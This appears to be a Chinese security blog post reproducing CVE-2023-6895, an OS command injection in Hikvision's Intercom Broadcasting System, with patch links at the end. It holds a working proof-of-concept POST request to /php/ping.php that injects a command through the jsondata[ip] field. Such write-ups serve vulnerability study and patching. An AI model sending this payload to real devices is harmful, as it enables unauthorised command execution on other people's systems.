海康威视对讲广播系统远程命令执行漏洞(CVE-2023-6895)
0x00写在前面
本次测试仅供学习使用,如若非法他用,与本平台和发布者无关,需自行负责!
0x01漏洞介绍
Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
0x02影响版本
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)
0x03漏洞复现
1.访问漏洞环境
2.对漏洞进行复现
POC (POST)
漏洞复现
POST /php/ping.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Connection: close
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
成功执行cd命令
3.nuclei工具测试(漏洞存在)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.spon.com.cn/
https://www.cnnvd.org.cn/home/loopholehttps://www.cnnvd.org.cn/home/loopholehttps://www.cnnvd.org.cn/home/loophole
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果